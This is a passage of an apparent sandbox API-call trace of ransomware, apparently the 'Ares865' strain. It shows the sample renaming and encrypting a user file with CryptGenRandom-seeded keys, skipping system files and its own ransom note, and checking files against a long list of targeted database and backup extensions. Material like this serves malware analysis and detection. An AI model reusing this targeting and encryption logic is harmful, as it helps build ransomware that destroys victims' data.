25 [0092.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1n55sxKLdAdwKRUxf.mkv.lnk.Ares865") returned 70 [0092.968] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1n55sxKLdAdwKRUxf.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1n55sxkldadwkruxf.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1n55sxKLdAdwKRUxf.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1n55sxkldadwkruxf.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0092.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1n55sxKLdAdwKRUxf.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1n55sxkldadwkruxf.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.969] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3880) returned 1 [0092.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.969] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.970] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.970] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.970] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1230, lpName=0x0) returned 0x15c [0092.970] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1230) returned 0x190000 [0092.971] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.972] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.972] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.973] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.973] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.973] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.973] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.973] CloseHandle (hObject=0x15c) returned 1 [0092.973] CloseHandle (hObject=0x118) returned 1 [0092.974] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.974] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.974] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.974] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c9e7ce0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3e1434c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3e1434c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1t27EyOo90bdWGY4.lnk", cAlternateFileName="1T27EY~1.LNK")) returned 1 [0092.974] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.974] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="aoldtz.exe") returned -1 [0092.974] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2=".") returned 1 [0092.974] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="..") returned 1 [0092.974] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="windows") returned -1 [0092.974] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="bootmgr") returned -1 [0092.974] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="temp") returned -1 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="pagefile.sys") returned -1 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="boot") returned -1 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="ids.txt") returned -1 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="ntuser.dat") returned -1 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="perflogs") returned -1 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2="MSBuild") returned -1 [0092.975] lstrlenW (lpString="1t27EyOo90bdWGY4.lnk") returned 20 [0092.975] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1n55sxKLdAdwKRUxf.mkv.lnk") returned 62 [0092.975] lstrcpyW (in: lpString1=0x2cce44a, lpString2="1t27EyOo90bdWGY4.lnk" | out: lpString1="1t27EyOo90bdWGY4.lnk") returned="1t27EyOo90bdWGY4.lnk" [0092.975] lstrlenW (lpString="1t27EyOo90bdWGY4.lnk") returned 20 [0092.975] lstrlenW (lpString="Ares865") returned 7 [0092.975] lstrcmpiW (lpString1="GY4.lnk", lpString2="Ares865") returned 1 [0092.975] lstrlenW (lpString=".dll") returned 4 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2=".dll") returned 1 [0092.975] lstrlenW (lpString=".lnk") returned 4 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2=".lnk") returned 1 [0092.975] lstrlenW (lpString=".ini") returned 4 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2=".ini") returned 1 [0092.975] lstrlenW (lpString=".sys") returned 4 [0092.975] lstrcmpiW (lpString1="1t27EyOo90bdWGY4.lnk", lpString2=".sys") returned 1 [0092.975] lstrlenW (lpString="1t27EyOo90bdWGY4.lnk") returned 20 [0092.975] lstrlenW (lpString="bak") returned 3 [0092.975] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.975] lstrlenW (lpString="ba_") returned 3 [0092.975] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.975] lstrlenW (lpString="dbb") returned 3 [0092.975] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.975] lstrlenW (lpString="vmdk") returned 4 [0092.975] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.975] lstrlenW (lpString="rar") returned 3 [0092.975] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.975] lstrlenW (lpString="zip") returned 3 [0092.975] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.975] lstrlenW (lpString="tgz") returned 3 [0092.975] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.975] lstrlenW (lpString="vbox") returned 4 [0092.976] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.976] lstrlenW (lpString="vdi") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.976] lstrlenW (lpString="vhd") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.976] lstrlenW (lpString="vhdx") returned 4 [0092.976] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.976] lstrlenW (lpString="avhd") returned 4 [0092.976] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.976] lstrlenW (lpString="db") returned 2 [0092.976] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.976] lstrlenW (lpString="db2") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.976] lstrlenW (lpString="db3") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.976] lstrlenW (lpString="dbf") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.976] lstrlenW (lpString="mdf") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.976] lstrlenW (lpString="mdb") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.976] lstrlenW (lpString="sql") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.976] lstrlenW (lpString="sqlite") returned 6 [0092.976] lstrcmpiW (lpString1="Y4.lnk", lpString2="sqlite") returned 1 [0092.976] lstrlenW (lpString="sqlite3") returned 7 [0092.976] lstrcmpiW (lpString1="GY4.lnk", lpString2="sqlite3") returned -1 [0092.976] lstrlenW (lpString="sqlitedb") returned 8 [0092.976] lstrcmpiW (lpString1="WGY4.lnk", lpString2="sqlitedb") returned 1 [0092.976] lstrlenW (lpString="xml") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.976] lstrlenW (lpString="$er") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.976] lstrlenW (lpString="4dd") returned 3 [0092.976] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.976] lstrlenW (lpString="4dl") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.977] lstrlenW (lpString="^^^") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.977] lstrlenW (lpString="abs") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.977] lstrlenW (lpString="abx") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.977] lstrlenW (lpString="accdb") returned 5 [0092.977] lstrcmpiW (lpString1="4.lnk", lpString2="accdb") returned -1 [0092.977] lstrlenW (lpString="accdc") returned 5 [0092.977] lstrcmpiW (lpString1="4.lnk", lpString2="accdc") returned -1 [0092.977] lstrlenW (lpString="accde") returned 5 [0092.977] lstrcmpiW (lpString1="4.lnk", lpString2="accde") returned -1 [0092.977] lstrlenW (lpString="accdr") returned 5 [0092.977] lstrcmpiW (lpString1="4.lnk", lpString2="accdr") returned -1 [0092.977] lstrlenW (lpString="accdt") returned 5 [0092.977] lstrcmpiW (lpString1="4.lnk", lpString2="accdt") returned -1 [0092.977] lstrlenW (lpString="accdw") returned 5 [0092.977] lstrcmpiW (lpString1="4.lnk", lpString2="accdw") returned -1 [0092.977] lstrlenW (lpString="accft") returned 5 [0092.977] lstrcmpiW (lpString1="4.lnk", lpString2="accft") returned -1 [0092.977] lstrlenW (lpString="adb") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.977] lstrlenW (lpString="adb") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.977] lstrlenW (lpString="ade") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.977] lstrlenW (lpString="adf") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.977] lstrlenW (lpString="adn") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.977] lstrlenW (lpString="adp") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.977] lstrlenW (lpString="alf") returned 3 [0092.977] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.977] lstrlenW (lpString="ask") returned 3 [0092.978] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.978] lstrlenW (lpString="btr") returned 3 [0092.978] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.978] lstrlenW (lpString="cat") returned 3 [0092.978] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.978] lstrlenW (lpString="cdb") returned 3 [0092.978] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.978] lstrlenW (lpString="ckp") returned 3 [0092.978] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.978] lstrlenW (lpString="cma") returned 3 [0092.978] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.978] lstrlenW (lpString="cpd") returned 3 [0092.978] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.978] lstrlenW (lpString="dacpac") returned 6 [0092.978] lstrcmpiW (lpString1="Y4.lnk", lpString2="dacpac") returned 1 [0092.978] lstrlenW (lpString="dad") returned 3 [0092.978] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.978] lstrlenW (lpString="dadiagrams") returned 10 [0092.978] lstrcmpiW (lpString1="bdWGY4.lnk", lpString2="dadiagrams") returned -1 [0092.978] lstrlenW (lpString="daschema") returned 8 [0092.978] lstrcmpiW (lpString1="WGY4.lnk", lpString2="daschema") returned 1 [0092.978] lstrlenW (lpString="db-journal") returned 10 [0092.978] lstrcmpiW (lpString1="bdWGY4.lnk", lpString2="db-journal") returned -1 [0092.978] lstrlenW (lpString="db-shm") returned 6 [0092.979] lstrcmpiW (lpString1="Y4.lnk", lpString2="db-shm") returned 1 [0092.979] lstrlenW (lpString="db-wal") returned 6 [0092.979] lstrcmpiW (lpString1="Y4.lnk", lpString2="db-wal") returned 1 [0092.979] lstrlenW (lpString="dbc") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.979] lstrlenW (lpString="dbs") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.979] lstrlenW (lpString="dbt") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.979] lstrlenW (lpString="dbv") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.979] lstrlenW (lpString="dbx") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.979] lstrlenW (lpString="dcb") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.979] lstrlenW (lpString="dct") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.979] lstrlenW (lpString="dcx") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.979] lstrlenW (lpString="ddl") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.979] lstrlenW (lpString="dlis") returned 4 [0092.979] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.979] lstrlenW (lpString="dp1") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.979] lstrlenW (lpString="dqy") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.979] lstrlenW (lpString="dsk") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.979] lstrlenW (lpString="dsn") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.979] lstrlenW (lpString="dtsx") returned 4 [0092.979] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.979] lstrlenW (lpString="dxl") returned 3 [0092.979] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.979] lstrlenW (lpString="eco") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.980] lstrlenW (lpString="ecx") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.980] lstrlenW (lpString="edb") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.980] lstrlenW (lpString="epim") returned 4 [0092.980] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.980] lstrlenW (lpString="fcd") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.980] lstrlenW (lpString="fdb") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.980] lstrlenW (lpString="fic") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.980] lstrlenW (lpString="flexolibrary") returned 12 [0092.980] lstrcmpiW (lpString1="90bdWGY4.lnk", lpString2="flexolibrary") returned -1 [0092.980] lstrlenW (lpString="fm5") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.980] lstrlenW (lpString="fmp") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.980] lstrlenW (lpString="fmp12") returned 5 [0092.980] lstrcmpiW (lpString1="4.lnk", lpString2="fmp12") returned -1 [0092.980] lstrlenW (lpString="fmpsl") returned 5 [0092.980] lstrcmpiW (lpString1="4.lnk", lpString2="fmpsl") returned -1 [0092.980] lstrlenW (lpString="fol") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.980] lstrlenW (lpString="fp3") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.980] lstrlenW (lpString="fp4") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.980] lstrlenW (lpString="fp5") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.980] lstrlenW (lpString="fp7") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.980] lstrlenW (lpString="fpt") returned 3 [0092.980] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.980] lstrlenW (lpString="frm") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.981] lstrlenW (lpString="gdb") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.981] lstrlenW (lpString="gdb") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.981] lstrlenW (lpString="grdb") returned 4 [0092.981] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.981] lstrlenW (lpString="gwi") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.981] lstrlenW (lpString="hdb") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.981] lstrlenW (lpString="his") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.981] lstrlenW (lpString="ib") returned 2 [0092.981] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.981] lstrlenW (lpString="idb") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.981] lstrlenW (lpString="ihx") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.981] lstrlenW (lpString="itdb") returned 4 [0092.981] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.981] lstrlenW (lpString="itw") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.981] lstrlenW (lpString="jet") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.981] lstrlenW (lpString="jtx") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.981] lstrlenW (lpString="kdb") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.981] lstrlenW (lpString="kexi") returned 4 [0092.981] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.981] lstrlenW (lpString="kexic") returned 5 [0092.981] lstrcmpiW (lpString1="4.lnk", lpString2="kexic") returned -1 [0092.981] lstrlenW (lpString="kexis") returned 5 [0092.981] lstrcmpiW (lpString1="4.lnk", lpString2="kexis") returned -1 [0092.981] lstrlenW (lpString="lgc") returned 3 [0092.981] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.982] lstrlenW (lpString="lwx") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.982] lstrlenW (lpString="maf") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.982] lstrlenW (lpString="maq") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.982] lstrlenW (lpString="mar") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.982] lstrlenW (lpString="marshal") returned 7 [0092.982] lstrcmpiW (lpString1="GY4.lnk", lpString2="marshal") returned -1 [0092.982] lstrlenW (lpString="mas") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.982] lstrlenW (lpString="mav") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.982] lstrlenW (lpString="maw") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.982] lstrlenW (lpString="mdbhtml") returned 7 [0092.982] lstrcmpiW (lpString1="GY4.lnk", lpString2="mdbhtml") returned -1 [0092.982] lstrlenW (lpString="mdn") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.982] lstrlenW (lpString="mdt") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.982] lstrlenW (lpString="mfd") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.982] lstrlenW (lpString="mpd") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.982] lstrlenW (lpString="mrg") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.982] lstrlenW (lpString="mud") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.982] lstrlenW (lpString="mwb") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.982] lstrlenW (lpString="myd") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.982] lstrlenW (lpString="ndf") returned 3 [0092.982] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.983] lstrlenW (lpString="nnt") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.983] lstrlenW (lpString="nrmlib") returned 6 [0092.983] lstrcmpiW (lpString1="Y4.lnk", lpString2="nrmlib") returned 1 [0092.983] lstrlenW (lpString="ns2") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.983] lstrlenW (lpString="ns3") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.983] lstrlenW (lpString="ns4") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.983] lstrlenW (lpString="nsf") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.983] lstrlenW (lpString="nv") returned 2 [0092.983] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.983] lstrlenW (lpString="nv2") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.983] lstrlenW (lpString="nwdb") returned 4 [0092.983] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.983] lstrlenW (lpString="nyf") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.983] lstrlenW (lpString="odb") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.983] lstrlenW (lpString="odb") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.983] lstrlenW (lpString="oqy") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.983] lstrlenW (lpString="ora") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.983] lstrlenW (lpString="orx") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.983] lstrlenW (lpString="owc") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.983] lstrlenW (lpString="p96") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.983] lstrlenW (lpString="p97") returned 3 [0092.983] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.984] lstrlenW (lpString="pan") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.984] lstrlenW (lpString="pdb") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.984] lstrlenW (lpString="pdm") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.984] lstrlenW (lpString="pnz") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.984] lstrlenW (lpString="qry") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.984] lstrlenW (lpString="qvd") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.984] lstrlenW (lpString="rbf") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.984] lstrlenW (lpString="rctd") returned 4 [0092.984] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.984] lstrlenW (lpString="rod") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.984] lstrlenW (lpString="rodx") returned 4 [0092.984] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.984] lstrlenW (lpString="rpd") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.984] lstrlenW (lpString="rsd") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.984] lstrlenW (lpString="sas7bdat") returned 8 [0092.984] lstrcmpiW (lpString1="WGY4.lnk", lpString2="sas7bdat") returned 1 [0092.984] lstrlenW (lpString="sbf") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.984] lstrlenW (lpString="scx") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.984] lstrlenW (lpString="sdb") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.984] lstrlenW (lpString="sdc") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.984] lstrlenW (lpString="sdf") returned 3 [0092.984] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.985] lstrlenW (lpString="sis") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.985] lstrlenW (lpString="spq") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.985] lstrlenW (lpString="te") returned 2 [0092.985] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.985] lstrlenW (lpString="teacher") returned 7 [0092.985] lstrcmpiW (lpString1="GY4.lnk", lpString2="teacher") returned -1 [0092.985] 